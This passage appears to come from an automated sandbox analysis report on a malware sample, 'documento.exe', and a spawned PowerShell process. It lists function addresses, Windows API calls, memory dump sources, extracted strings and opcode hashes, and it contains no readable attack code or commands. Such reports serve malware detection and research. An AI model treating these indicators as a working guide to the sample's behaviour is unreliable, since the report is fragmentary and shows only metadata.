                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-4017390910
                                                • Opcode ID: 1acdd7952de975a5de59207208c6b073b3c222a5b17fc555175c0845e7698c1d
                                                • Instruction ID: d46364a902ea990bd632c56cfb9f57f9e2cdd9ba0813e856c63e7cee72968c4e
                                                • Opcode Fuzzy Hash: 1acdd7952de975a5de59207208c6b073b3c222a5b17fc555175c0845e7698c1d
                                                • Instruction Fuzzy Hash: 93E0EC32915120ABC7225F65ED04B9ABBA87B49B26F09006BF9407B3A08B746D425AD9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004057B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\documento.exe,C:\Users\user\Desktop\documento.exe,80000000,00000003), ref: 004057BC
                                                • CharPrevA.USER32(80000000,00000000), ref: 004057CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-66916594
                                                • Opcode ID: 34bcb0359ecd18d08228093df84e7486f7a8c477fb5e2f0dc73f73f3b7a35111
                                                • Instruction ID: 18ef7b42b2ca9dadb34ddb0bde1cbbab447e34e044d1250ac1c79b5d16d3cc30
                                                • Opcode Fuzzy Hash: 34bcb0359ecd18d08228093df84e7486f7a8c477fb5e2f0dc73f73f3b7a35111
                                                • Instruction Fuzzy Hash: 8ED0A762418D70AEF30362109C04B8F6A58CF13700F194463E040A7190C2784C414BFD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004058D5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058FD
                                                • CharNextA.USER32(00000000), ref: 0040590E
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 0fc7b795b21fde4e840a5a8ebe1bc240de770827404be4bbaaf079e1ba8cc010
                                                • Instruction ID: 18e4c75142147f65de27112721ce36ab9a51ac25249ca18f40cf651f68c78b39
                                                • Opcode Fuzzy Hash: 0fc7b795b21fde4e840a5a8ebe1bc240de770827404be4bbaaf079e1ba8cc010
                                                • Instruction Fuzzy Hash: 01F0F632505414FFCB029FA4DD00D9EBBA8DF05360B2540B5F800F7250D234EE01AB99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 00267D20 Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1031cc2cc37c6a68d7594e2f071451b087f8ac30a5126cdf92b04c4e34799b17
                                                • Instruction ID: 12d26f1223209c1defc41a7300929f66bc5fadcf9b371822ade6c259267fe1d6
                                                • Opcode Fuzzy Hash: 1031cc2cc37c6a68d7594e2f071451b087f8ac30a5126cdf92b04c4e34799b17
                                                • Instruction Fuzzy Hash: C4B18170E1420ACFDF10CFA9D8857ADBBF2AF88318F148529D415A7294EB759C99CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002685F0 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530530266.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_260000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08ba884ef94010e8ae645eb0ff6e58a5fd1d7226cd801d09299f1ae63f016f9f
                                                • Instruction ID: 4b780ffe630dbef2390bd56354949c1c0c742f53466012c42f62d7b453ba8506
                                                • Opcode Fuzzy Hash: 08ba884ef94010e8ae645eb0ff6e58a5fd1d7226cd801d09299f1ae63f016f9f
                                                • Instruction Fuzzy Hash: B8B16174E1020ACFDF10CFA9D8957ADBBF2AF88314F248229D415E7394EB749895CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD3750 Relevance: 32.9, Strings: 25, Instructions: 1605COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$4'p$4'p$8#h$8#h$`O&$h%h$h%h$h%h$h%h$h%h$h%h$h%h$h%h$h%h$h%h$tPp$tPp$[h$[h$[h$[h$[h$[h
                                                • API String ID: 0-201543752
                                                • Opcode ID: bef65de4b4fb30226be6598e9f4de6c761a606711d6b88f5f45f8d4c7a0a56b8
                                                • Instruction ID: 391061e9729a3bed4d9b6710b9423d7d2fb9a4403b15eb097cab7f24e022456e
                                                • Opcode Fuzzy Hash: bef65de4b4fb30226be6598e9f4de6c761a606711d6b88f5f45f8d4c7a0a56b8
                                                • Instruction Fuzzy Hash: B2D25E74B00204DFDB14DF68C550BAEBBB2AF89304F6481AAE9569F355CB71ED82CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD86F0 Relevance: 28.3, Strings: 22, Instructions: 752COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0Up$4'p$4'p$4'p$4'p$8#h$8#h$`O&$h%h$h%h$h%h$h%h$h%h$h%h$h%h$h%h$tPp$tPp$[h$[h$[h$[h
                                                • API String ID: 0-4039313753
                                                • Opcode ID: 6de5c0a03605f3262d26f3014650325bc60ad8b52794952365a6fef1d6554b9f
                                                • Instruction ID: bf41c976fbb14a943602eda1bd3108e4a437f3503326782e3d433ed42e61c3f8
                                                • Opcode Fuzzy Hash: 6de5c0a03605f3262d26f3014650325bc60ad8b52794952365a6fef1d6554b9f
                                                • Instruction Fuzzy Hash: 6F421675B042409FCB149B6C8854B6ABBB2AFD9310F28C4BBD546CB395DE39DC41C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD0D80 Relevance: 14.3, Strings: 11, Instructions: 591COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: <{$ <{$4'p$4'p$D<{$h%h$h%h$h<{$$p$$p$$p
                                                • API String ID: 0-2102509644
                                                • Opcode ID: 753b0287d56b2aaa39ddaa3210a0985042116e0579f32a54d299c5a9a4366291
                                                • Instruction ID: bf53f61bead4f8e074f78c878706f9684d8b00f44f5f4bb25303c8b007c44434
                                                • Opcode Fuzzy Hash: 753b0287d56b2aaa39ddaa3210a0985042116e0579f32a54d299c5a9a4366291
                                                • Instruction Fuzzy Hash: 2E122935704340AFCB159B688850BAABBF2AFC5310F2884BBD946CB396DB35DD81C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD1C48 Relevance: 13.0, Strings: 10, Instructions: 480COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8#h$8#h$h%h$h%h$h%h$h%h$h%h$h%h$[h$[h
                                                • API String ID: 0-216944290
                                                • Opcode ID: 5f8764f31da1201296af94b547f05cfaedf7d69f4177cc0676f578fed3c7dcdf
                                                • Instruction ID: 385e9e717b1d936ae0a751d38c36a97dfc0d4c751a18be0440f6dd3ac317b3f6
                                                • Opcode Fuzzy Hash: 5f8764f31da1201296af94b547f05cfaedf7d69f4177cc0676f578fed3c7dcdf
                                                • Instruction Fuzzy Hash: 57125C74B002049FDB54DF98C584EAABBF2AF99310F64C06AE8169F355CB35ED82CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD4414 Relevance: 12.3, Strings: 9, Instructions: 1095COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$8#h$h%h$h%h$h%h$h%h$h%h$h%h$[h
                                                • API String ID: 0-853500719
                                                • Opcode ID: c1adf55a6024126d84e9013c1cffa762675eb74039c00199bf8ace3d31080383
                                                • Instruction ID: 3980f7394bfc841f79e2ce365ea94022bb918d92f238dfb7187511a306ad3baf
                                                • Opcode Fuzzy Hash: c1adf55a6024126d84e9013c1cffa762675eb74039c00199bf8ace3d31080383
                                                • Instruction Fuzzy Hash: D3A22D74A00204DFDB24DB58C540FAABBB2EF89304F65C1AAE9559B356CB71ED82CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 046B18BC Relevance: 9.2, Strings: 7, Instructions: 496COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.537966584.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$h%h$h%h$$p$$p$$p
                                                • API String ID: 0-2066519885
                                                • Opcode ID: 6932039ffc81eaad8a6e5d09f7d534520bc15ce7c5a9857ca1bee69fcea62b0c
                                                • Instruction ID: 1cf569e0cbd6734f8c8649fab7bf1773e7720eaf49b3189badca12c3b4fe49dc
                                                • Opcode Fuzzy Hash: 6932039ffc81eaad8a6e5d09f7d534520bc15ce7c5a9857ca1bee69fcea62b0c
                                                • Instruction Fuzzy Hash: 2FF1FA35B00200AFCB199F68D4606EABBE2AF96350F24807AD595CB355FB31ED82C7D1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD4780 Relevance: 8.0, Strings: 6, Instructions: 505COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8#h$h%h$h%h$h%h$h%h$[h
                                                • API String ID: 0-1348317926
                                                • Opcode ID: e2e97681136676cb4132409642d781d46d40bbbad59126c1861b855af3292f2d
                                                • Instruction ID: a747dab7c00958209c147d9077d7cc25f16dfc9e24d0d6f11df4d26925bbf49e
                                                • Opcode Fuzzy Hash: e2e97681136676cb4132409642d781d46d40bbbad59126c1861b855af3292f2d
                                                • Instruction Fuzzy Hash: 9D222B78A01204DFDB14DF58D580EAABBB2FF89314F25C16AE9559B356C772EC82CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD47A0 Relevance: 8.0, Strings: 6, Instructions: 493COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8#h$h%h$h%h$h%h$h%h$[h
                                                • API String ID: 0-1348317926
                                                • Opcode ID: efdc3501edf10f45b6a23dcfbf24288e03bd1e79b3438baf21013315e3f2d448
                                                • Instruction ID: c392fe7cb2217b3b00041eb5aec0f3d705e8d32e9b6176ab0f5f2062adfcfdd6
                                                • Opcode Fuzzy Hash: efdc3501edf10f45b6a23dcfbf24288e03bd1e79b3438baf21013315e3f2d448
                                                • Instruction Fuzzy Hash: 86221B78A01204DFDB14DF98D580EAABBB2FF89314F65C06AE9159B355C772EC82CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD4E1C Relevance: 6.7, Strings: 5, Instructions: 465COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8#h$h%h$h%h$h%h$[h
                                                • API String ID: 0-3945192550
                                                • Opcode ID: 709cc157ac9fecf66e12159e477346249c8d038b9bf52521e7b7498b780fbb49
                                                • Instruction ID: aa3662f88c04b72ce451cb0f87e4e69a0d3ca11ec533c534a3a9d435e684546e
                                                • Opcode Fuzzy Hash: 709cc157ac9fecf66e12159e477346249c8d038b9bf52521e7b7498b780fbb49
                                                • Instruction Fuzzy Hash: 40122D74A01204DFDB24DF98D580E6ABBB2FF89314F24C06AE9569B355C772EC82CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD2116 Relevance: 6.7, Strings: 5, Instructions: 422COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8#h$h%h$h%h$h%h$[h
                                                • API String ID: 0-3945192550
                                                • Opcode ID: 81c42c003137fe7fdc8dcfa31d52a93f31516a7f6bcadf0958112349c49068f1
                                                • Instruction ID: 670d8b2fa290ce436a5d94a7262f7aeba70cf11d58e23f864963fdb98caf7fdb
                                                • Opcode Fuzzy Hash: 81c42c003137fe7fdc8dcfa31d52a93f31516a7f6bcadf0958112349c49068f1
                                                • Instruction Fuzzy Hash: 60023A74B00204EFDB54DB58C580FA9BBB2EF98314F24C16AE956AB355C772ED82CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD5478 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$4'p$4'p
                                                • API String ID: 0-4019061985
                                                • Opcode ID: 8bc8a738fa193c2a38413f1407b72dd03a622c9793007f3114d990e67938331f
                                                • Instruction ID: 07bb7fec811eb35fd0b900110639a13e45c2e2e3404a5a9340a1379afd59857b
                                                • Opcode Fuzzy Hash: 8bc8a738fa193c2a38413f1407b72dd03a622c9793007f3114d990e67938331f
                                                • Instruction Fuzzy Hash: DFE18D74F002049FD714DB68D455BAEBBB2AF88304F64C56AE811AF355CB75DC82CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD3AE8 Relevance: 4.3, Strings: 3, Instructions: 569COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$h%h$[h
                                                • API String ID: 0-2212847111
                                                • Opcode ID: 0d687b6f4f3f93ac56e8968cdc989dc58a1f95d6218f153cfcb5b7d647ba84fc
                                                • Instruction ID: be5a15c66a822af5bce135943b36209f8009723c2e4deb4d2303de8fd857c0b4
                                                • Opcode Fuzzy Hash: 0d687b6f4f3f93ac56e8968cdc989dc58a1f95d6218f153cfcb5b7d647ba84fc
                                                • Instruction Fuzzy Hash: FE322F74A002049FDB24DB58C540FAEBBB2BB89304F25C1AAE955AB355CB71ED86CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADC50E Relevance: 4.3, Strings: 3, Instructions: 559COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$h%h$h%h
                                                • API String ID: 0-2059351901
                                                • Opcode ID: 59f97f1cae0c91c11e2433a82a1b9e116fb2a9c8d13c7a79dad67b4fcca534d6
                                                • Instruction ID: 6d231aaed74214644763395e04137f1a63d9006829236fed0d7be255e0ee2cd3
                                                • Opcode Fuzzy Hash: 59f97f1cae0c91c11e2433a82a1b9e116fb2a9c8d13c7a79dad67b4fcca534d6
                                                • Instruction Fuzzy Hash: A6326074B00218DFD764DB58C950BAABBB2AF89710F5080A5D909AF395CB71ED868F81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD4564 Relevance: 3.1, Strings: 2, Instructions: 555COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$h%h
                                                • API String ID: 0-4265485267
                                                • Opcode ID: 345736637301ab5b766eaa02ae2cba1b245bb104e238964d72323591043d4d19
                                                • Instruction ID: b5dbfc3e8da36bcd78f0a7ca60702c13a58e9e5c917806e49ee0ddf039b8daf1
                                                • Opcode Fuzzy Hash: 345736637301ab5b766eaa02ae2cba1b245bb104e238964d72323591043d4d19
                                                • Instruction Fuzzy Hash: E3324074A002049FDB64DB58C940FAEBBB2EB89304F5481A9E955AF395CB71ED82CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADBE23 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p
                                                • API String ID: 0-3973980265
                                                • Opcode ID: 06d97bfa07a12250245f95e8d6efe11cd1a1360423ee7552c7135ea53c89ed81
                                                • Instruction ID: 64857c5b14e106b81456ba7188ee51d5b1f7f4ec482f900857e1503d31456359
                                                • Opcode Fuzzy Hash: 06d97bfa07a12250245f95e8d6efe11cd1a1360423ee7552c7135ea53c89ed81
                                                • Instruction Fuzzy Hash: A3127274B00218DFD764DB58C951BEABBB2EF89300F5080A5D909AF395CB71ED828F81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD5AD0 Relevance: 2.7, Strings: 2, Instructions: 237COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h%h$h%h
                                                • API String ID: 0-778770776
                                                • Opcode ID: d5dbd72efaf9b3fdc01f81bb2a69a85d79bf8db486ca118808f3ed3da5c968b3
                                                • Instruction ID: 95abdc8f003ebb33b8cccf8a9297c365aff155adb5aa5d33c62c7d975694475f
                                                • Opcode Fuzzy Hash: d5dbd72efaf9b3fdc01f81bb2a69a85d79bf8db486ca118808f3ed3da5c968b3
                                                • Instruction Fuzzy Hash: 30710535F047059FCB249B78984466ABBF2AF89310B28847BD886DB385EA71DC41C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD804D Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h%h$h%h
                                                • API String ID: 0-778770776
                                                • Opcode ID: 33e650753e9949e7a744b06e0c213d028684c8c893eb72e41ca58f2f25af6696
                                                • Instruction ID: c770cc836dd05fbc95986d57de96d81fdeb37a24f5cc7bf96a5c767be1cfb8ac
                                                • Opcode Fuzzy Hash: 33e650753e9949e7a744b06e0c213d028684c8c893eb72e41ca58f2f25af6696
                                                • Instruction Fuzzy Hash: 133117B5B002109FCB259B789850ABABBB29FC9314B24817BDA52DF345CE35DC47C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD19F0 Relevance: 2.6, Strings: 2, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: d={$d={
                                                • API String ID: 0-432196026
                                                • Opcode ID: ab55d24a51181d06eafcf36794651cada1decd9b81ffc9b1ef3e357007828ce3
                                                • Instruction ID: b40ef3553c78d3ceaf1ff2f0f18011beeed39616590b191b974b36aea4c8c5b3
                                                • Opcode Fuzzy Hash: ab55d24a51181d06eafcf36794651cada1decd9b81ffc9b1ef3e357007828ce3
                                                • Instruction Fuzzy Hash: B1212735700310ABDB245A7D8840B7BBAEAABC8750F28843BE547CB3D4DAB5DD81C361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD10F0 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: <{$ <{
                                                • API String ID: 0-206724904
                                                • Opcode ID: dab3ba612caababf517cbe15241466c9fb2ac00dccd7279825b6f08fba968e13
                                                • Instruction ID: b56ed5c6dd1ce0459db275b3f1dde4defa594cf0dfedbcc01e67783ad4a3b2d8
                                                • Opcode Fuzzy Hash: dab3ba612caababf517cbe15241466c9fb2ac00dccd7279825b6f08fba968e13
                                                • Instruction Fuzzy Hash: C5116075704204BBDB145E599841B7ABBB7EB88310F1CC26AFA0A9B385C775DDC2C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD451E Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p
                                                • API String ID: 0-481844870
                                                • Opcode ID: b6696b282cb86d5b5b4c8492e582d3caad3af23b7cf1a855987559e05621b258
                                                • Instruction ID: a121b049a90365acfef4970575e595f5bf9415206fcc9e6ca17c0316d3c2a1f7
                                                • Opcode Fuzzy Hash: b6696b282cb86d5b5b4c8492e582d3caad3af23b7cf1a855987559e05621b258
                                                • Instruction Fuzzy Hash: 4C023074B002049FD764DB54C941FAEBBB2AF89304F6481A9E945AF395CB71ED82CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADC5F6 Relevance: 1.7, Strings: 1, Instructions: 406COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p
